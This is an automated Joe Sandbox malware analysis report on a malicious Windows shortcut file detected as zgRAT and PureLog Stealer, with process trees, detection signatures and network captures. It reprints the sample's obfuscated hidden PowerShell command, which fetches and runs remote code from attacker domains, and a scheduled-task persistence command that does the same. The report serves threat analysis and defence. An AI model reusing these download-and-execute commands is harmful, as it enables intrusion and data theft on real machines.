Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BX7yRz7XqF.lnk

Overview

General Information

Sample name:BX7yRz7XqF.lnk
renamed because original name is a hash value
Original sample name:7d1585f9ed317bf06a63bd5aaaf015f6066c51a7153370579b2836d66142f877.lnk
Analysis ID:1522858
MD5:b642cbf2d292b2e92d5038e6dfbd2de7
SHA1:4f92090113a65f13fa6ad128c7e492984a99d294
SHA256:7d1585f9ed317bf06a63bd5aaaf015f6066c51a7153370579b2836d66142f877
Tags:lnkSideWinderuser-JAMESWT_MHT
Infos:

Detection

PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Windows shortcut file (LNK) starts blacklisted processes
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Machine Learning detection for sample
Obfuscated command line found
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses nslookup.exe to query domains
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Windows shortcut file (LNK) contains suspicious command line arguments
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 5140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PING.EXE (PID: 6904 cmdline: "C:\Windows\system32\PING.EXE" www.nadra.gov.pk MD5: 2F46799D79D22AC72C241EC0322B011D)
    • nslookup.exe (PID: 6648 cmdline: "C:\Windows\system32\nslookup.exe" www.yahoo.com MD5: F2E3950C1023ACF80765C918791999C0)
    • nslookup.exe (PID: 6532 cmdline: "C:\Windows\system32\nslookup.exe" www.protonmail.com MD5: F2E3950C1023ACF80765C918791999C0)
    • chrome.exe (PID: 4656 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pmo.gov.pk/site/404 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 1928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1916,i,14445282091827991487,7005601379036879201,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • powershell.exe (PID: 7616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7848 cmdline: "C:\Windows\system32\cmd.exe" /k schtasks /create /sc daily /tn LocalMCleaner /tr "Powershell -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell" /st 10:13 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • schtasks.exe (PID: 7864 cmdline: schtasks /create /sc daily /tn LocalMCleaner /tr "Powershell -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell" /st 10:13 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • svchost.exe (PID: 1536 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 7884 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXE -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_zgRATDetects zgRATditekSHen
      • 0x71bec:$s1: file:///
      • 0x71ad8:$s2: {11111-22222-10009-11112}
      • 0x71b7c:$s3: {11111-22222-50001-00000}
      • 0x6ae33:$s4: get_Module
      • 0x6b27d:$s5: Reverse
      • 0x71001:$s6: BlockCopy
      • 0x71018:$s7: ReadByte
      • 0x71bfe:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
      0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        Process Memory Space: powershell.exe PID: 8136INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x52b567:$b2: ::FromBase64String(
        • 0x2ab38:$s1: -join
        • 0x37d8f:$s1: -join
        • 0x3b251:$s1: -join
        • 0x3b8eb:$s1: -join
        • 0x3d3e7:$s1: -join
        • 0x3f649:$s1: -join
        • 0x3fe70:$s1: -join
        • 0x406e1:$s1: -join
        • 0x40e1c:$s1: -join
        • 0x40e4e:$s1: -join
        • 0x40e96:$s1: -join
        • 0x40eb5:$s1: -join
        • 0x41706:$s1: -join
        • 0x41882:$s1: -join
        • 0x418fa:$s1: -join
        • 0x4198d:$s1: -join
        • 0x41be4:$s1: -join
        • 0x43d8f:$s1: -join
        • 0x1c8528:$s1: -join
        • 0x1c86e5:$s1: -join

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        15.2.powershell.exe.1d1c9b50000.6.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
          15.2.powershell.exe.1d1c9b50000.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            15.2.powershell.exe.1d1c9b50000.6.raw.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
            • 0x71bec:$s1: file:///
            • 0x71ad8:$s2: {11111-22222-10009-11112}
            • 0x71b7c:$s3: {11111-22222-50001-00000}
            • 0x6ae33:$s4: get_Module
            • 0x6b27d:$s5: Reverse
            • 0x71001:$s6: BlockCopy
            • 0x71018:$s7: ReadByte
            • 0x71bfe:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
            15.2.powershell.exe.1d1c9b50000.6.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              15.2.powershell.exe.1d1c9b50000.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 7 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious PowerShell Parameter Substring
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell, ProcessId: 5140, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell, ProcessId: 5140, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1536, ProcessName: svchost.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Schedule system process
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\system32\cmd.exe" /k schtasks /create /sc daily /tn LocalMCleaner /tr "Powershell -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell" /st 10:13 /f, CommandLine: "C:\Windows\system32\cmd.exe" /k schtasks /create /sc daily /tn LocalMCleaner /tr "Powershell -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell" /st 10:13 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7616, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /k schtasks /create /sc daily /tn LocalMCleaner /tr "Powershell -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell" /st 10:13 /f, ProcessId: 7848, ProcessName: cmd.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: BX7yRz7XqF.lnkReversingLabs: Detection: 42%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
                Machine Learning detection for sample
                Source: BX7yRz7XqF.lnkJoe Sandbox ML: detected
                Source: https://pmo.gov.pk/site/404HTTP Parser: No favicon
                Source: unknownHTTPS traffic detected: 172.67.149.9:443 -> 192.168.2.7:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.7:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.234:443 -> 192.168.2.7:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.7:49725 version: TLS 1.2
                Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 0000000A.00000002.1474008637.000002487F140000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000A.00000002.1472696900.000002487ECEE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Adobe.pdb source: powershell.exe, 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: Adobe.pdb( source: powershell.exe, 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1672029257.000001D1C9810000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 0000000A.00000002.1472696900.000002487ED98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb@ source: powershell.exe, 0000000A.00000002.1474008637.000002487F0E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000F.00000002.1672029257.000001D1C9810000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n.pdb source: powershell.exe, 0000000A.00000002.1474008637.000002487F0E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1672029257.000001D1C9810000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000A.00000002.1472696900.000002487ED98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb^ source: powershell.exe, 0000000F.00000002.1672029257.000001D1C9810000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdbPi source: powershell.exe, 0000000F.00000002.1669768304.000001D1C956B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.1474008637.000002487F14A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1669768304.000001D1C956B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1474008637.000002487F0E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer328 source: powershell.exe, 0000000A.00000002.1474008637.000002487F0E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ion.pdb source: powershell.exe, 0000000A.00000002.1474008637.000002487F0E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdb source: powershell.exe, 0000000A.00000002.1474008637.000002487F140000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: pdbpdblib.pdb source: powershell.exe, 0000000F.00000002.1669768304.000001D1C956B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000A.00000002.1474008637.000002487F140000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000A.00000002.1474008637.000002487F14A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.pdb source: powershell.exe, 0000000F.00000002.1672029257.000001D1C9810000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb+ source: powershell.exe, 0000000A.00000002.1474008637.000002487F0E2000.00000004.00000020.00020000.00000000.sdmp

                Networking

                barindex
                Uses nslookup.exe to query domains
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.yahoo.com
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.protonmail.com
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.yahoo.comJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.protonmail.comJump to behavior
                Uses ping.exe to check the status of other devices and networks
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" www.nadra.gov.pk
                Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: 0h1HX+d4bLFaNYIrsTupkQ==Sec-WebSocket-Version: 13Host: gateway.discord.gg
                Source: Joe Sandbox ViewIP Address: 162.159.135.234 162.159.135.234
                Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CYBERNET-APCyberInternetServicesPvtLtdPK CYBERNET-APCyberInternetServicesPvtLtdPK
                Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownUDP traffic detected without corresponding DNS query: 20.101.57.9
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /site/404 HTTP/1.1Host: pmo.gov.pkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pmo.gov.pkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cookiesession1=678B28B3B2979C8EA40140B962781A42
                Source: global trafficHTTP traffic detected: GET /DSCTSC/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ofc.mofserviceserver.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+RXM+ul9gZsDE19&MD=3r6m3nSv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                Source: global trafficHTTP traffic detected: GET /1000/500/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cloud.dellicon.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: 0h1HX+d4bLFaNYIrsTupkQ==Sec-WebSocket-Version: 13Host: gateway.discord.gg
                Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+RXM+ul9gZsDE19&MD=3r6m3nSv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                Source: global trafficHTTP traffic detected: GET //WinSysMgr/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pmofficepakistancloudserver.shiftroof.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /DSCTSC/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ofc.mofserviceserver.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /1000/500/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cloud.dellicon.topConnection: Keep-Alive
                Source: BX7yRz7XqF.lnkString found in binary or memory: -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell9%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 00000000.00000002.3889819595.0000020571230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell equals www.yahoo.com (Yahoo)
